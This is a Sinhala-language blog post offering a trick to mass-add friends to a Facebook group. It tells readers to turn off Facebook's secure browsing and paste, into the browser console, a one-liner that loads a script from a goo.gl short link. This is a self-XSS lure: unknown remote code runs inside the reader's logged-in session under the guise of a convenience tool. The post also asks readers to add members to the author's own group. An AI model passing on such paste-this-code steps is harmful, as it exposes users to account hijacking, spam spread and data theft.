Top Ad unit 728 × 90

recent post

recent

ලෙසීයෙන්ම ගෘප් එකකට එක පාර members ලා අම්බානෙට ඇඩ් කරන්නේ මෙහෙමයි



මෙන්න මේකනං බුකියේ ගෘප් හදන් ඉන්න අයට ඵට්ටේට වටින් වැඩක් ... මේ ක්‍රමෙන් එක පාර මෙම්බර්ස්ලා 1000ක් ගෘප් එකට දාන්නා පුළුවන්.. යාලුවනේ මේකෙදි වෙන්නේ අපේ ඉන්න ෆ්රෙන්ඩ්ස්ලට අදාළ ගෘප් එකට ඔටෝම ඉන්වයිට් වෙන එක...  ඉතින් ඔටෝම ඉන්වයිට් වෙනවා කියන්නේ ඔටෝම ඇඩ් වෙනවා කියන එක තමයි ...


මුලින්ම මේකෙන් මෙම්බර්ස්ලා ඇඩ් කරන්න කලින් .. පිලි පදින්න ඕනි දෙයක් තියනවා .. අපේ ෆේස් බුක් එකවුන්ට් එකේ   Secure browsing  disable. කරන්න ඕනි  මෙතනින් ගිහින් ඒ සෙටින්ස් වෙන කරගන්න ..






මුලින්ම අපි මේක ගුගල් ක්‍රෝම්(google chrome)  බ්‍රවුසරෙන් කරන විදිය බලමු


ඉහත පරිදි setting හදාගත්තට පස්සේ මුලින්ම  ෆ්‍රෙන්ඩ්ස්ලා add කරන්න ඕනි ගෘප් එකට යන්න

ඊට පස්සේ F12 button එක ප්‍රෙස් කරන්න නැතිනම  right click කරලා Inspect Element දෙන්න ..
ඊට පස්සේ යටින් ටැබ් එකක් එයි එකෙන් console කියන එක click කරන්න 



දැන් ඔතන එන එක උඩ ආයේ right click කරලා clear console දෙන්න ඊට පස්සේ මේ වගේ හිස් වෙයි ..

දැන් මම මේ පහත  දෙන කෝඩ් එක  ඔතනට past කරන්න 

document.body.appendChild(document.createElement('script')).src='http://goo.gl/TDJi8';


දැන්  enter ඔබන්න ... ටිකක් වෙලා බලාගෙන ඉන්න  පහත සඳහන විදියට ගෘප් එකට මෙම්බර්ස්ලා ඇඩ් වෙනවා පෙනේවි 




දැන් ඔන්න ක්‍රෝම් එකෙන් නං ඇඩ් කරා දැන් අපි firefox පාවිච්චි කරන අය ගැනත් බලමු නේ .. මෙහෙමයි .. ඉහත පරිදි සෙටින්ග්ස් හදාගෙන .. ඊට පස්සේ කලින් කිවුව් වගේම ඔබට මෙම්බර්ස්ලා ඇඩ් කරන්න ඕනි ගෘප්  එක උඩට ගිහිල්ලා  ctrl+shift+K  ඔබන්න  ඊට පස්සේ උඩින් ටැබ් එකක් එයි මම ඔය කහපාටින් හයිලයිට් කරලා රතු පාටින් ඉරක් ගහල තියෙන්නේ අන්න  අන්න  එතනට  පහත දීල තියන කෝඩ් එක කොපි කරලා පේස්ට් කරන්න එච්චරයි ...   ඊට පස්සේ enter කරන්න



document.body.appendChild(document.createElement('script')).src='http://goo.gl/YzGHt';


යාලුවෙන තව පොඩි ප්‍රශ්නයක් තියනවා .. මගේ  කලින් සොෆ්ට්වෙයාර් දුන්නනේ අන්න ඒවායේ ෂෙයාර් කරපු එකවුන්ට් එක ඩිසේබල් වෙලා .. මට ආයේ අප්ලෝඩ් කරන්න ඩේටා නැහැ . ඉලග මාසේ අප්ලෝඩ් කරලා දෙන්නම් ආ එතකන් තර වෙන්න එපා ඇ ... 

තව දෙයක් .. මේක කියල දුන්නු උදවුවටවත්  මෙන්න මේ ගෘප් එකට මෙම්බර්ස්ලා ටිකක ඇඩ් කරන්න ඇ .. 

ලෙසීයෙන්ම ගෘප් එකකට එක පාර members ලා අම්බානෙට ඇඩ් කරන්නේ මෙහෙමයි Reviewed by සුදු මහත්තයා on 4:13 PM Rating: 5
Powered By Blogger,

Contact Form

Name

Email *

Message *

Powered by Blogger.